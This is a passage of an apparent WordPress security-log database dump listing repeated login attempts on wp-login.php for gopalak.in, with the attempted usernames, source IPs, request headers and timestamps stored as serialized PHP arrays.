QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745583871.383594;s:12:\"REQUEST_TIME\";i:1745583871;}}','103.185.75.30',0,'2025-04-25 17:54:33','1970-01-01 00:00:00'),(94318,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50542\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745584274.8892429;s:12:\"REQUEST_TIME\";i:1745584274;}}','23.239.27.53',0,'2025-04-25 18:01:16','1970-01-01 00:00:00'),(94319,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42690\";s:11:\"REMOTE_ADDR\";s:15:\"217.182.158.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745676972.5496969;s:12:\"REQUEST_TIME\";i:1745676972;}}','217.182.158.226',0,'2025-04-26 19:46:14','1970-01-01 00:00:00'),(94320,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36554\";s:11:\"REMOTE_ADDR\";s:12:\"81.88.53.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745677405.3134799;s:12:\"REQUEST_TIME\";i:1745677405;}}','81.88.53.143',0,'2025-04-26 19:53:27','1970-01-01 00:00:00'),(94321,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43098\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.132.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745678279.9806659;s:12:\"REQUEST_TIME\";i:1745678279;}}','66.102.132.28',0,'2025-04-26 20:08:01','1970-01-01 00:00:00'),(94322,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44560\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.67.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745678720.6613369;s:12:\"REQUEST_TIME\";i:1745678720;}}','198.27.67.210',0,'2025-04-26 20:15:22','1970-01-01 00:00:00'),(94323,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53246\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.145\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745679163.5479009;s:12:\"REQUEST_TIME\";i:1745679163;}}','199.188.200.145',0,'2025-04-26 20:22:45','1970-01-01 00:00:00'),(94324,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37720\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.11.121\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745679602.768836;s:12:\"REQUEST_TIME\";i:1745679602;}}','139.59.11.121',0,'2025-04-26 20:30:04','1970-01-01 00:00:00'),(94325,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32838\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.119.106\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745680045.813879;s:12:\"REQUEST_TIME\";i:1745680045;}}','198.54.119.106',0,'2025-04-26 20:37:27','1970-01-01 00:00:00'),(94326,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36874\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745680486.084327;s:12:\"REQUEST_TIME\";i:1745680486;}}','103.169.35.190',0,'2025-04-26 20:44:47','1970-01-01 00:00:00'),(94327,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58472\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.207.177\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745680923.8929629;s:12:\"REQUEST_TIME\";i:1745680923;}}','173.212.207.177',0,'2025-04-26 20:52:05','1970-01-01 00:00:00'),(94328,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 